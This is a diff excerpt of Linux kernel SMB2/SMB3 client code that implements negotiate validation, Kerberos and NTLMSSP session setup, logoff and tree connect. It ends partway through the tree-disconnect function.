++	/* In SMB3.11 preauth integrity supersedes validate negotiate */
++	if (server->dialect == SMB311_PROT_ID)
++		return 0;
++
++	/*
++	 * The validation ioctl must be signed, so there is no point sending
++	 * this if we cannot sign it (i.e. we are not a known user).  Even if
++	 * signing is not required (enabled but not negotiated), we
++	 * selectively sign just this, the first and only signed request on a
++	 * connection.  Validating the negotiate info helps reduce attack
++	 * vectors.
++	 */
++	if (tcon->ses->session_flags & SMB2_SESSION_FLAG_IS_GUEST)
++		return 0; /* validation requires signing */
++
++	if (tcon->ses->user_name == NULL) {
++		cifs_dbg(FYI, "Can't validate negotiate: null user mount\n");
++		return 0; /* validation requires signing */
++	}
++
++	if (tcon->ses->session_flags & SMB2_SESSION_FLAG_IS_NULL)
++		cifs_tcon_dbg(VFS, "Unexpected null user (anonymous) auth flag sent by server\n");
++
++	pneg_inbuf = kmalloc(sizeof(*pneg_inbuf), GFP_NOFS);
++	if (!pneg_inbuf)
++		return -ENOMEM;
++
++	pneg_inbuf->Capabilities =
++			cpu_to_le32(server->vals->req_capabilities);
++	if (tcon->ses->chan_max > 1)
++		pneg_inbuf->Capabilities |= cpu_to_le32(SMB2_GLOBAL_CAP_MULTI_CHANNEL);
++
++	memcpy(pneg_inbuf->Guid, server->client_guid,
++					SMB2_CLIENT_GUID_SIZE);
++
++	if (tcon->ses->sign)
++		pneg_inbuf->SecurityMode =
++			cpu_to_le16(SMB2_NEGOTIATE_SIGNING_REQUIRED);
++	else if (global_secflags & CIFSSEC_MAY_SIGN)
++		pneg_inbuf->SecurityMode =
++			cpu_to_le16(SMB2_NEGOTIATE_SIGNING_ENABLED);
++	else
++		pneg_inbuf->SecurityMode = 0;
++
++	if (strcmp(server->vals->version_string,
++		SMB3ANY_VERSION_STRING) == 0) {
++		pneg_inbuf->Dialects[0] = cpu_to_le16(SMB30_PROT_ID);
++		pneg_inbuf->Dialects[1] = cpu_to_le16(SMB302_PROT_ID);
++		pneg_inbuf->Dialects[2] = cpu_to_le16(SMB311_PROT_ID);
++		pneg_inbuf->DialectCount = cpu_to_le16(3);
++		/* SMB 2.1 not included so subtract one dialect from len */
++		inbuflen = sizeof(*pneg_inbuf) -
++				(sizeof(pneg_inbuf->Dialects[0]));
++	} else if (strcmp(server->vals->version_string,
++		SMBDEFAULT_VERSION_STRING) == 0) {
++		pneg_inbuf->Dialects[0] = cpu_to_le16(SMB21_PROT_ID);
++		pneg_inbuf->Dialects[1] = cpu_to_le16(SMB30_PROT_ID);
++		pneg_inbuf->Dialects[2] = cpu_to_le16(SMB302_PROT_ID);
++		pneg_inbuf->Dialects[3] = cpu_to_le16(SMB311_PROT_ID);
++		pneg_inbuf->DialectCount = cpu_to_le16(4);
++		/* structure is big enough for 4 dialects */
++		inbuflen = sizeof(*pneg_inbuf);
++	} else {
++		/* otherwise specific dialect was requested */
++		pneg_inbuf->Dialects[0] =
++			cpu_to_le16(server->vals->protocol_id);
++		pneg_inbuf->DialectCount = cpu_to_le16(1);
++		/* structure is big enough for 4 dialects, sending only 1 */
++		inbuflen = sizeof(*pneg_inbuf) -
++				sizeof(pneg_inbuf->Dialects[0]) * 3;
++	}
++
++	rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
++		FSCTL_VALIDATE_NEGOTIATE_INFO,
++		(char *)pneg_inbuf, inbuflen, CIFSMaxBufSize,
++		(char **)&pneg_rsp, &rsplen);
++	if (rc == -EOPNOTSUPP) {
++		/*
++		 * Old Windows versions or Netapp SMB server can return
++		 * not supported error. Client should accept it.
++		 */
++		cifs_tcon_dbg(VFS, "Server does not support validate negotiate\n");
++		rc = 0;
++		goto out_free_inbuf;
++	} else if (rc != 0) {
++		cifs_tcon_dbg(VFS, "validate protocol negotiate failed: %d\n",
++			      rc);
++		rc = -EIO;
++		goto out_free_inbuf;
++	}
++
++	rc = -EIO;
++	if (rsplen != sizeof(*pneg_rsp)) {
++		cifs_tcon_dbg(VFS, "Invalid protocol negotiate response size: %d\n",
++			      rsplen);
++
++		/* relax check since Mac returns max bufsize allowed on ioctl */
++		if (rsplen > CIFSMaxBufSize || rsplen < sizeof(*pneg_rsp))
++			goto out_free_rsp;
++	}
++
++	/* check validate negotiate info response matches what we got earlier */
++	if (pneg_rsp->Dialect != cpu_to_le16(server->dialect))
++		goto vneg_out;
++
++	if (pneg_rsp->SecurityMode != cpu_to_le16(server->sec_mode))
++		goto vneg_out;
++
++	/* do not validate server guid because not saved at negprot time yet */
++
++	if ((le32_to_cpu(pneg_rsp->Capabilities) | SMB2_NT_FIND |
++	      SMB2_LARGE_FILES) != server->capabilities)
++		goto vneg_out;
++
++	/* validate negotiate successful */
++	rc = 0;
++	cifs_dbg(FYI, "validate negotiate info successful\n");
++	goto out_free_rsp;
++
++vneg_out:
++	cifs_tcon_dbg(VFS, "protocol revalidation - security settings mismatch\n");
++out_free_rsp:
++	kfree(pneg_rsp);
++out_free_inbuf:
++	kfree(pneg_inbuf);
++	return rc;
++}
++
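++/*
++ * Map the mount's requested security type to what session setup will use:
++ * Kerberos and raw NTLMSSP pass through, NTLMv2 is carried inside raw
++ * NTLMSSP on SMB2/3, and Unspecified picks whichever mechanism the server
++ * advertised (subject to the global security flags).
++ */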
++enum securityEnum
++smb2_select_sectype(struct TCP_Server_Info *server, enum securityEnum requested)
++{
++	switch (requested) {
++	case Kerberos:
++	case RawNTLMSSP:
++		return requested;
++	case NTLMv2:
++		return RawNTLMSSP;
++	case Unspecified:
++		if (server->sec_ntlmssp &&
++			(global_secflags & CIFSSEC_MAY_NTLMSSP))
++			return RawNTLMSSP;
++		if ((server->sec_kerberos || server->sec_mskerberos) &&
++			(global_secflags & CIFSSEC_MAY_KRB5))
++			return Kerberos;
++		fallthrough;
++	default:
++		return Unspecified;
++	}
++}
++
++struct SMB2_sess_data {
++	unsigned int xid;
++	struct cifs_ses *ses;
++	struct TCP_Server_Info *server;
++	struct nls_table *nls_cp;
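++	/* next step of the session setup state machine; NULL when finished */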
++	void (*func)(struct SMB2_sess_data *);
++	int result;
++	u64 previous_session;
++
++	/* we will send the SMB in three pieces:
++	 * a fixed length beginning part, an optional
++	 * SPNEGO blob (which can be zero length), and a
++	 * last part which will include the strings
++	 * and rest of bcc area. This allows us to avoid
++	 * a large 17K buffer allocation.
++	 */
++	int buf0_type;
++	struct kvec iov[2];
++};
++
++static int
++SMB2_sess_alloc_buffer(struct SMB2_sess_data *sess_data)
++{
++	int rc;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	struct smb2_sess_setup_req *req;
++	unsigned int total_len;
++	bool is_binding = false;
++
++	rc = smb2_plain_req_init(SMB2_SESSION_SETUP, NULL, server,
++				 (void **) &req,
++				 &total_len);
++	if (rc)
++		return rc;
++
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
++
++	if (is_binding) {
++		req->hdr.SessionId = cpu_to_le64(ses->Suid);
++		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
++		req->PreviousSessionId = 0;
++		req->Flags = SMB2_SESSION_REQ_FLAG_BINDING;
++		cifs_dbg(FYI, "Binding to sess id: %llx\n", ses->Suid);
++	} else {
++		/* First session, not a reauthenticate */
++		req->hdr.SessionId = 0;
++		/*
++		 * if reconnect, we need to send previous sess id
++		 * otherwise it is 0
++		 */
++		req->PreviousSessionId = cpu_to_le64(sess_data->previous_session);
++		req->Flags = 0; /* MBZ */
++		cifs_dbg(FYI, "Fresh session. Previous: %llx\n",
++			 sess_data->previous_session);
++	}
++
++	/* enough to enable echoes and oplocks and one max size write */
++	req->hdr.CreditRequest = cpu_to_le16(130);
++
++	/* only one of SMB2 signing flags may be set in SMB2 request */
++	if (server->sign)
++		req->SecurityMode = SMB2_NEGOTIATE_SIGNING_REQUIRED;
++	else if (global_secflags & CIFSSEC_MAY_SIGN) /* one flag unlike MUST_ */
++		req->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED;
++	else
++		req->SecurityMode = 0;
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	req->Capabilities = cpu_to_le32(SMB2_GLOBAL_CAP_DFS);
++#else
++	req->Capabilities = 0;
++#endif /* DFS_UPCALL */
++
++	req->Channel = 0; /* MBZ */
++
++	sess_data->iov[0].iov_base = (char *)req;
++	/* 1 for pad */
++	sess_data->iov[0].iov_len = total_len - 1;
++	/*
++	 * This variable will be used to clear the buffer
++	 * allocated above in case of any error in the calling function.
++	 */
++	sess_data->buf0_type = CIFS_SMALL_BUFFER;
++
++	return 0;
++}
++
++static void
++SMB2_sess_free_buffer(struct SMB2_sess_data *sess_data)
++{
++	struct kvec *iov = sess_data->iov;
++
++	/* iov[1] is already freed by caller */
++	if (sess_data->buf0_type != CIFS_NO_BUFFER && iov[0].iov_base)
++		memzero_explicit(iov[0].iov_base, iov[0].iov_len);
++
++	free_rsp_buf(sess_data->buf0_type, iov[0].iov_base);
++	sess_data->buf0_type = CIFS_NO_BUFFER;
++}
++
++static int
++SMB2_sess_sendreceive(struct SMB2_sess_data *sess_data)
++{
++	int rc;
++	struct smb_rqst rqst;
++	struct smb2_sess_setup_req *req = sess_data->iov[0].iov_base;
++	struct kvec rsp_iov = { NULL, 0 };
++
++	/* Testing shows that buffer offset must be at location of Buffer[0] */
++	req->SecurityBufferOffset =
++		cpu_to_le16(sizeof(struct smb2_sess_setup_req) - 1 /* pad */);
++	req->SecurityBufferLength = cpu_to_le16(sess_data->iov[1].iov_len);
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = sess_data->iov;
++	rqst.rq_nvec = 2;
++
++	/* BB add code to build os and lm fields */
++	rc = cifs_send_recv(sess_data->xid, sess_data->ses,
++			    sess_data->server,
++			    &rqst,
++			    &sess_data->buf0_type,
++			    CIFS_LOG_ERROR | CIFS_SESS_OP, &rsp_iov);
++	cifs_small_buf_release(sess_data->iov[0].iov_base);
++	memcpy(&sess_data->iov[0], &rsp_iov, sizeof(struct kvec));
++
++	return rc;
++}
++
++static int
++SMB2_sess_establish_session(struct SMB2_sess_data *sess_data)
++{
++	int rc = 0;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++
++	cifs_server_lock(server);
++	if (server->ops->generate_signingkey) {
++		rc = server->ops->generate_signingkey(ses, server);
++		if (rc) {
++			cifs_dbg(FYI,
++				"SMB3 session key generation failed\n");
++			cifs_server_unlock(server);
++			return rc;
++		}
++	}
++	if (!server->session_estab) {
++		server->sequence_number = 0x2;
++		server->session_estab = true;
++	}
++	cifs_server_unlock(server);
++
++	cifs_dbg(FYI, "SMB2/3 session established successfully\n");
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_UPCALL
++static void
++SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
++{
++	int rc;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	struct cifs_spnego_msg *msg;
++	struct key *spnego_key = NULL;
++	struct smb2_sess_setup_rsp *rsp = NULL;
++	bool is_binding = false;
++
++	rc = SMB2_sess_alloc_buffer(sess_data);
++	if (rc)
++		goto out;
++
++	spnego_key = cifs_get_spnego_key(ses, server);
++	if (IS_ERR(spnego_key)) {
++		rc = PTR_ERR(spnego_key);
++		if (rc == -ENOKEY)
++			cifs_dbg(VFS, "Verify user has a krb5 ticket and keyutils is installed\n");
++		spnego_key = NULL;
++		goto out;
++	}
++
++	msg = spnego_key->payload.data[0];
++	/*
++	 * check version field to make sure that cifs.upcall is
++	 * sending us a response in an expected form
++	 */
++	if (msg->version != CIFS_SPNEGO_UPCALL_VERSION) {
++		cifs_dbg(VFS, "bad cifs.upcall version. Expected %d got %d\n",
++			 CIFS_SPNEGO_UPCALL_VERSION, msg->version);
++		rc = -EKEYREJECTED;
++		goto out_put_spnego_key;
++	}
++
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
++
++	/* keep session key if binding */
++	if (!is_binding) {
++		kfree_sensitive(ses->auth_key.response);
++		ses->auth_key.response = kmemdup(msg->data, msg->sesskey_len,
++						 GFP_KERNEL);
++		if (!ses->auth_key.response) {
++			cifs_dbg(VFS, "Kerberos can't allocate (%u bytes) memory\n",
++				 msg->sesskey_len);
++			rc = -ENOMEM;
++			goto out_put_spnego_key;
++		}
++		ses->auth_key.len = msg->sesskey_len;
++	}
++
++	sess_data->iov[1].iov_base = msg->data + msg->sesskey_len;
++	sess_data->iov[1].iov_len = msg->secblob_len;
++
++	rc = SMB2_sess_sendreceive(sess_data);
++	if (rc)
++		goto out_put_spnego_key;
++
++	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
++	/* keep session id and flags if binding */
++	if (!is_binding) {
++		ses->Suid = le64_to_cpu(rsp->hdr.SessionId);
++		ses->session_flags = le16_to_cpu(rsp->SessionFlags);
++	}
++
++	rc = SMB2_sess_establish_session(sess_data);
++out_put_spnego_key:
++	key_invalidate(spnego_key);
++	key_put(spnego_key);
++	if (rc) {
++		kfree_sensitive(ses->auth_key.response);
++		ses->auth_key.response = NULL;
++		ses->auth_key.len = 0;
++	}
++out:
++	sess_data->result = rc;
++	sess_data->func = NULL;
++	SMB2_sess_free_buffer(sess_data);
++}
++#else
++static void
++SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
++{
++	cifs_dbg(VFS, "Kerberos negotiated but upcall support disabled!\n");
++	sess_data->result = -EOPNOTSUPP;
++	sess_data->func = NULL;
++}
++#endif
++
++static void
++SMB2_sess_auth_rawntlmssp_authenticate(struct SMB2_sess_data *sess_data);
++
++static void
++SMB2_sess_auth_rawntlmssp_negotiate(struct SMB2_sess_data *sess_data)
++{
++	int rc;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	struct smb2_sess_setup_rsp *rsp = NULL;
++	unsigned char *ntlmssp_blob = NULL;
++	bool use_spnego = false; /* else use raw ntlmssp */
++	u16 blob_length = 0;
++	bool is_binding = false;
++
++	/*
++	 * If memory allocation is successful, caller of this function
++	 * frees it.
++	 */
++	ses->ntlmssp = kmalloc(sizeof(struct ntlmssp_auth), GFP_KERNEL);
++	if (!ses->ntlmssp) {
++		rc = -ENOMEM;
++		goto out_err;
++	}
++	ses->ntlmssp->sesskey_per_smbsess = true;
++
++	rc = SMB2_sess_alloc_buffer(sess_data);
++	if (rc)
++		goto out_err;
++
++	rc = build_ntlmssp_smb3_negotiate_blob(&ntlmssp_blob,
++					  &blob_length, ses, server,
++					  sess_data->nls_cp);
++	if (rc)
++		goto out;
++
++	if (use_spnego) {
++		/* BB eventually need to add this */
++		cifs_dbg(VFS, "spnego not supported for SMB2 yet\n");
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++	sess_data->iov[1].iov_base = ntlmssp_blob;
++	sess_data->iov[1].iov_len = blob_length;
++
++	rc = SMB2_sess_sendreceive(sess_data);
++	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
++
++	/* If true, rc here is expected and not an error */
++	if (sess_data->buf0_type != CIFS_NO_BUFFER &&
++		rsp->hdr.Status == STATUS_MORE_PROCESSING_REQUIRED)
++		rc = 0;
++
++	if (rc)
++		goto out;
++
++	if (offsetof(struct smb2_sess_setup_rsp, Buffer) !=
++			le16_to_cpu(rsp->SecurityBufferOffset)) {
++		cifs_dbg(VFS, "Invalid security buffer offset %d\n",
++			le16_to_cpu(rsp->SecurityBufferOffset));
++		rc = -EIO;
++		goto out;
++	}
++	rc = decode_ntlmssp_challenge(rsp->Buffer,
++			le16_to_cpu(rsp->SecurityBufferLength), ses);
++	if (rc)
++		goto out;
++
++	cifs_dbg(FYI, "rawntlmssp session setup challenge phase\n");
++
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
++
++	/* keep existing ses id and flags if binding */
++	if (!is_binding) {
++		ses->Suid = le64_to_cpu(rsp->hdr.SessionId);
++		ses->session_flags = le16_to_cpu(rsp->SessionFlags);
++	}
++
++out:
++	kfree_sensitive(ntlmssp_blob);
++	SMB2_sess_free_buffer(sess_data);
++	if (!rc) {
++		sess_data->result = 0;
++		sess_data->func = SMB2_sess_auth_rawntlmssp_authenticate;
++		return;
++	}
++out_err:
++	kfree_sensitive(ses->ntlmssp);
++	ses->ntlmssp = NULL;
++	sess_data->result = rc;
++	sess_data->func = NULL;
++}
++
++static void
++SMB2_sess_auth_rawntlmssp_authenticate(struct SMB2_sess_data *sess_data)
++{
++	int rc;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	struct smb2_sess_setup_req *req;
++	struct smb2_sess_setup_rsp *rsp = NULL;
++	unsigned char *ntlmssp_blob = NULL;
++	bool use_spnego = false; /* else use raw ntlmssp */
++	u16 blob_length = 0;
++	bool is_binding = false;
++
++	rc = SMB2_sess_alloc_buffer(sess_data);
++	if (rc)
++		goto out;
++
++	req = (struct smb2_sess_setup_req *) sess_data->iov[0].iov_base;
++	req->hdr.SessionId = cpu_to_le64(ses->Suid);
++
++	rc = build_ntlmssp_auth_blob(&ntlmssp_blob, &blob_length,
++				     ses, server,
++				     sess_data->nls_cp);
++	if (rc) {
++		cifs_dbg(FYI, "build_ntlmssp_auth_blob failed %d\n", rc);
++		goto out;
++	}
++
++	if (use_spnego) {
++		/* BB eventually need to add this */
++		cifs_dbg(VFS, "spnego not supported for SMB2 yet\n");
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++	sess_data->iov[1].iov_base = ntlmssp_blob;
++	sess_data->iov[1].iov_len = blob_length;
++
++	rc = SMB2_sess_sendreceive(sess_data);
++	if (rc)
++		goto out;
++
++	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
++
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
++
++	/* keep existing ses id and flags if binding */
++	if (!is_binding) {
++		ses->Suid = le64_to_cpu(rsp->hdr.SessionId);
++		ses->session_flags = le16_to_cpu(rsp->SessionFlags);
++	}
++
++	rc = SMB2_sess_establish_session(sess_data);
++#ifdef CONFIG_CIFS_DEBUG_DUMP_KEYS
++	if (ses->server->dialect < SMB30_PROT_ID) {
++		cifs_dbg(VFS, "%s: dumping generated SMB2 session keys\n", __func__);
++		/*
++		 * The session id is opaque in terms of endianness, so we can't
++		 * print it as a long long. we dump it as we got it on the wire
++		 */
++		cifs_dbg(VFS, "Session Id    %*ph\n", (int)sizeof(ses->Suid),
++			 &ses->Suid);
++		cifs_dbg(VFS, "Session Key   %*ph\n",
++			 SMB2_NTLMV2_SESSKEY_SIZE, ses->auth_key.response);
++		cifs_dbg(VFS, "Signing Key   %*ph\n",
++			 SMB3_SIGN_KEY_SIZE, ses->auth_key.response);
++	}
++#endif
++out:
++	kfree_sensitive(ntlmssp_blob);
++	SMB2_sess_free_buffer(sess_data);
++	kfree_sensitive(ses->ntlmssp);
++	ses->ntlmssp = NULL;
++	sess_data->result = rc;
++	sess_data->func = NULL;
++}
++
++static int
++SMB2_select_sec(struct SMB2_sess_data *sess_data)
++{
++	int type;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++
++	type = smb2_select_sectype(server, ses->sectype);
++	cifs_dbg(FYI, "sess setup type %d\n", type);
++	if (type == Unspecified) {
++		cifs_dbg(VFS, "Unable to select appropriate authentication method!\n");
++		return -EINVAL;
++	}
++
++	switch (type) {
++	case Kerberos:
++		sess_data->func = SMB2_auth_kerberos;
++		break;
++	case RawNTLMSSP:
++		sess_data->func = SMB2_sess_auth_rawntlmssp_negotiate;
++		break;
++	default:
++		cifs_dbg(VFS, "secType %d not supported!\n", type);
++		return -EOPNOTSUPP;
++	}
++
++	return 0;
++}
++
++int
++SMB2_sess_setup(const unsigned int xid, struct cifs_ses *ses,
++		struct TCP_Server_Info *server,
++		const struct nls_table *nls_cp)
++{
++	int rc = 0;
++	struct SMB2_sess_data *sess_data;
++
++	cifs_dbg(FYI, "Session Setup\n");
++
++	if (!server) {
++		WARN(1, "%s: server is NULL!\n", __func__);
++		return -EIO;
++	}
++
++	sess_data = kzalloc(sizeof(struct SMB2_sess_data), GFP_KERNEL);
++	if (!sess_data)
++		return -ENOMEM;
++
++	sess_data->xid = xid;
++	sess_data->ses = ses;
++	sess_data->server = server;
++	sess_data->buf0_type = CIFS_NO_BUFFER;
++	sess_data->nls_cp = (struct nls_table *) nls_cp;
++	sess_data->previous_session = ses->Suid;
++
++	rc = SMB2_select_sec(sess_data);
++	if (rc)
++		goto out;
++
++	/*
++	 * Initialize the session hash with the server one.
++	 */
++	memcpy(ses->preauth_sha_hash, server->preauth_sha_hash,
++	       SMB2_PREAUTH_HASH_SIZE);
++
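++	/* run the auth state machine; each handler sets ->func to the next step */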
++	while (sess_data->func)
++		sess_data->func(sess_data);
++
++	if ((ses->session_flags & SMB2_SESSION_FLAG_IS_GUEST) && (ses->sign))
++		cifs_server_dbg(VFS, "signing requested but authenticated as guest\n");
++	rc = sess_data->result;
++out:
++	kfree_sensitive(sess_data);
++	return rc;
++}
++
++int
++SMB2_logoff(const unsigned int xid, struct cifs_ses *ses)
++{
++	struct smb_rqst rqst;
++	struct smb2_logoff_req *req; /* response is also trivial struct */
++	int rc = 0;
++	struct TCP_Server_Info *server;
++	int flags = 0;
++	unsigned int total_len;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++
++	cifs_dbg(FYI, "disconnect session %p\n", ses);
++
++	if (ses && (ses->server))
++		server = ses->server;
++	else
++		return -EIO;
++
++	/* no need to send SMB logoff if uid already closed due to reconnect */
++	spin_lock(&ses->chan_lock);
++	if (CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++		spin_unlock(&ses->chan_lock);
++		goto smb2_session_already_dead;
++	}
++	spin_unlock(&ses->chan_lock);
++
++	rc = smb2_plain_req_init(SMB2_LOGOFF, NULL, ses->server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	/* since there is no tcon, smb2_init cannot do this, so do it here */
++	req->hdr.SessionId = cpu_to_le64(ses->Suid);
++
++	if (ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA)
++		flags |= CIFS_TRANSFORM_REQ;
++	else if (server->sign)
++		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
++
++	flags |= CIFS_NO_RSP_BUF;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, ses->server,
++			    &rqst, &resp_buf_type, flags, &rsp_iov);
++	cifs_small_buf_release(req);
++	/*
++	 * No tcon so can't do
++	 * cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_fail[SMB2...]);
++	 */
++
++smb2_session_already_dead:
++	return rc;
++}
++
++static inline void cifs_stats_fail_inc(struct cifs_tcon *tcon, uint16_t code)
++{
++	cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_failed[code]);
++}
++
++#define MAX_SHARENAME_LENGTH (255 /* server */ + 80 /* share */ + 1 /* NULL */)
++
++/* These are similar values to what Windows uses */
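++/* i.e. up to 256 chunks of at most 1 MiB each, and at most 16 MiB per copy */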
++static inline void init_copy_chunk_defaults(struct cifs_tcon *tcon)
++{
++	tcon->max_chunks = 256;
++	tcon->max_bytes_chunk = 1048576;
++	tcon->max_bytes_copy = 16777216;
++}
++
++int
++SMB2_tcon(const unsigned int xid, struct cifs_ses *ses, const char *tree,
++	  struct cifs_tcon *tcon, const struct nls_table *cp)
++{
++	struct smb_rqst rqst;
++	struct smb2_tree_connect_req *req;
++	struct smb2_tree_connect_rsp *rsp = NULL;
++	struct kvec iov[2];
++	struct kvec rsp_iov = { NULL, 0 };
++	int rc = 0;
++	int resp_buftype;
++	int unc_path_len;
++	__le16 *unc_path = NULL;
++	int flags = 0;
++	unsigned int total_len;
++	struct TCP_Server_Info *server;
++
++	/* always use master channel */
++	server = ses->server;
++
++	cifs_dbg(FYI, "TCON\n");
++
++	if (!server || !tree)
++		return -EIO;
++
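++	/* the tree name is sent as UTF-16, so two bytes per character */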
++	unc_path = kmalloc(MAX_SHARENAME_LENGTH * 2, GFP_KERNEL);
++	if (unc_path == NULL)
++		return -ENOMEM;
++
++	unc_path_len = cifs_strtoUTF16(unc_path, tree, strlen(tree), cp) + 1;
++	unc_path_len *= 2;
++	if (unc_path_len < 2) {
++		kfree(unc_path);
++		return -EINVAL;
++	}
++
++	/* SMB2 TREE_CONNECT request must be called with TreeId == 0 */
++	tcon->tid = 0;
++	atomic_set(&tcon->num_remote_opens, 0);
++	rc = smb2_plain_req_init(SMB2_TREE_CONNECT, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc) {
++		kfree(unc_path);
++		return rc;
++	}
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	iov[0].iov_base = (char *)req;
++	/* 1 for pad */
++	iov[0].iov_len = total_len - 1;
++
++	/* Testing shows that buffer offset must be at location of Buffer[0] */
++	req->PathOffset = cpu_to_le16(sizeof(struct smb2_tree_connect_req)
++			- 1 /* pad */);
++	req->PathLength = cpu_to_le16(unc_path_len - 2);
++	iov[1].iov_base = unc_path;
++	iov[1].iov_len = unc_path_len;
++
++	/*
++	 * 3.11 tcon req must be signed if not encrypted. See MS-SMB2 3.2.4.1.1
++	 * unless it is guest or anonymous user. See MS-SMB2 3.2.5.3.1
++	 * (Samba servers don't always set the flag so also check if null user)
++	 */
++	if ((server->dialect == SMB311_PROT_ID) &&
++	    !smb3_encryption_required(tcon) &&
++	    !(ses->session_flags &
++		    (SMB2_SESSION_FLAG_IS_GUEST|SMB2_SESSION_FLAG_IS_NULL)) &&
++	    ((ses->user_name != NULL) || (ses->sectype == Kerberos)))
++		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 2;
++
++	/* Need 64 credits for a max size write, so ask for more in case we don't have them yet */
++	req->hdr.CreditRequest = cpu_to_le16(64);
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	cifs_small_buf_release(req);
++	rsp = (struct smb2_tree_connect_rsp *)rsp_iov.iov_base;
++	trace_smb3_tcon(xid, tcon->tid, ses->Suid, tree, rc);
++	if ((rc != 0) || (rsp == NULL)) {
++		cifs_stats_fail_inc(tcon, SMB2_TREE_CONNECT_HE);
++		tcon->need_reconnect = true;
++		goto tcon_error_exit;
++	}
++
++	switch (rsp->ShareType) {
++	case SMB2_SHARE_TYPE_DISK:
++		cifs_dbg(FYI, "connection to disk share\n");
++		break;
++	case SMB2_SHARE_TYPE_PIPE:
++		tcon->pipe = true;
++		cifs_dbg(FYI, "connection to pipe share\n");
++		break;
++	case SMB2_SHARE_TYPE_PRINT:
++		tcon->print = true;
++		cifs_dbg(FYI, "connection to printer\n");
++		break;
++	default:
++		cifs_server_dbg(VFS, "unknown share type %d\n", rsp->ShareType);
++		rc = -EOPNOTSUPP;
++		goto tcon_error_exit;
++	}
++
++	tcon->share_flags = le32_to_cpu(rsp->ShareFlags);
++	tcon->capabilities = rsp->Capabilities; /* we keep caps little endian */
++	tcon->maximal_access = le32_to_cpu(rsp->MaximalAccess);
++	tcon->tid = le32_to_cpu(rsp->hdr.Id.SyncId.TreeId);
++	strscpy(tcon->tree_name, tree, sizeof(tcon->tree_name));
++
++	if ((rsp->Capabilities & SMB2_SHARE_CAP_DFS) &&
++	    ((tcon->share_flags & SHI1005_FLAGS_DFS) == 0))
++		cifs_tcon_dbg(VFS, "DFS capability contradicts DFS flag\n");
++
++	if (tcon->seal &&
++	    !(server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
++		cifs_tcon_dbg(VFS, "Encryption is requested but not supported\n");
++
++	init_copy_chunk_defaults(tcon);
++	if (server->ops->validate_negotiate)
++		rc = server->ops->validate_negotiate(xid, tcon);
++tcon_exit:
++
++	free_rsp_buf(resp_buftype, rsp);
++	kfree(unc_path);
++	return rc;
++
++tcon_error_exit:
++	if (rsp && rsp->hdr.Status == STATUS_BAD_NETWORK_NAME)
++		cifs_tcon_dbg(VFS, "BAD_NETWORK_NAME: %s\n", tree);
++	goto tcon_exit;
++}
++
++int
++SMB2_tdis(const unsigned int xid, struct cifs_tcon *tcon)
++{
++	struct smb_rqst rqst;
++	struct smb2_tree_disconnect_req *req; /* response is trivial */
++	int rc = 0;
++	struct cifs_ses *ses = tcon->ses;
++	int flags = 0;
++	unsigned int total_len;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++
++	cifs_dbg(FYI, "Tree Disconnect\n");
++
++	if (!ses || !(ses->server))
++		return -EIO;
++
++	trace_smb3_tdis_enter(xid, tcon->tid, ses->Suid, tcon->tree_name);
++	spin_lock(&ses->chan_lock);
++	if ((tcon->need_reconnect) ||
++	    (CIFS_ALL_CHANS_NEED_RECONNECT(tcon->ses))) {
++		spin_unlock(&ses->chan_lock);
++		return 0;
++	}
++	spin_unlock(&ses->chan_lock);
++
++	invalidate_all_cached_dirs(tcon);
++
++	rc = smb2_plain_req_init(SMB2_TREE_DISCONNECT, tcon, ses->server,
++				 (void **) &req,
++				 &total_len);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
